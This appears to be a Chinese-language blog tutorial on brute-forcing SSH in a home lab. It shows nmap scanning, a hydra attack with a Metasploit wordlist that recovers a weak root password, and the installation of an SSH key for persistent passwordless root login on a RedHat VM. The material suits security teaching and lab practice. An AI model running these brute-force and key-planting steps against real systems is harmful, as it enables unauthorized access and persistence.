Linux之SSH服务爆破

一、ssh 密码破解

1.查看RedHat Linux的版本信息

[root@ping ~]# cat /proc/version
Linux version 2.6.32-573.el6.x86_64 (mockbuild@x86-027.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Wed Jul 1 18:23:37 EDT 2015

2.查看Kali Linux的版本信息

root@kali:~# cat /proc/version
Linux version 4.9.0-kali4-amd64 (devel@kali.org) (gcc version 6.3.0 20170415 (Debian 6.3.0-14) ) #1 SMP Debian 4.9.25-1kali1 (2017-05-04)

3.查看RedHat Linux网卡的IP地址

[root@ping ~]# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 52:54:00:1C:25:4A  
          inet addr:192.168.100.5  Bcast:192.168.100.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe1c:254a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:217 errors:0 dropped:0 overruns:0 frame:0
          TX packets:76 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:17149 (16.7 KiB)  TX bytes:9661 (9.4 KiB)

4.查看Kali Linux网卡的IP地址

root@kali:~# ifconfig virbr1
virbr1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.100.1  netmask 255.255.255.0  broadcast 192.168.100.255
        ether 52:54:00:4a:8c:c8  txqueuelen 1000  (Ethernet)
        RX packets 79  bytes 9385 (9.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 102  bytes 10949 (10.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

5.查看kali是否可以连接RedHat Linux的SSH服务

root@kali:~# telnet 192.168.100.5 22
Trying 192.168.100.5...
Connected to 192.168.100.5.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.3

6.查看RedHat Linux的22端口是否开启

root@kali:~# nmap -p 22 192.168.100.5
Starting Nmap 7.40 ( https://nmap.org ) at 2018-03-13 20:15 UTC
Nmap scan report for www.ping.cn (192.168.100.5)
Host is up (0.00025s latency).
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 52:54:00:1C:25:4A (QEMU virtual NIC)

7.在Kali下默认有爆破的字典

root@kali:~# cat /usr/share/wordlists/metasploit/unix_passwords.txt | wc -l
1008

8.hydra工具,指定用户名是root,爆破的字典,和ssh服务  

root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt  ssh://192.168.100.5
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-03-13 20:26:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 1008 login tries (l:1/p:1008), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.100.5   login: root   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-03-13 20:26:14

8.登录RedHat Linux查看安全日志信息

root@kali:~/.ssh# ssh root@192.168.100.5
[root@ping ~]# cat /var/log/secure | grep "Failed password" | wc -l
21

 

 二、SSH服务免密码登录

1.创建私钥

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:J3puYy3569PnEYHvygLvfSHTkcBZdnz63G/PsTsqYPU root@kali
The key's randomart image is:
+---[RSA 2048]----+
|           . oo..|
|            +o .o|
|            ...o.|
|           . .+. |
|        S o ..o+.|
|       ..=  oEo.+|
|      . o=.. ooo.|
|       o* =+..o+=|
|       o.*=+==o+*|
+----[SHA256]-----+

2.查看私钥文件

root@kali:~# cd .ssh/
root@kali:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts

3.本地主机的公钥复制到远程主机的用户家目录下,并创建一个隐藏目录

root@kali:~# ssh-copy-id root@192.168.100.5
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
root@192.168.100.5's password:

4.使用ssh客户端工具登录到RedHat上

root@kali:~/.ssh# ssh root@192.168.100.5
Last login: Wed Mar 14 04:24:29 2018 from 192.168.100.1
[root@ping ~]# uname -m
x86_64

5.查看公钥文件

[root@ping .ssh]# ls
authorized_keys

 



posted @ 2018-03-13 20:56  citong  阅读(1550)  评论(1)    收藏  举报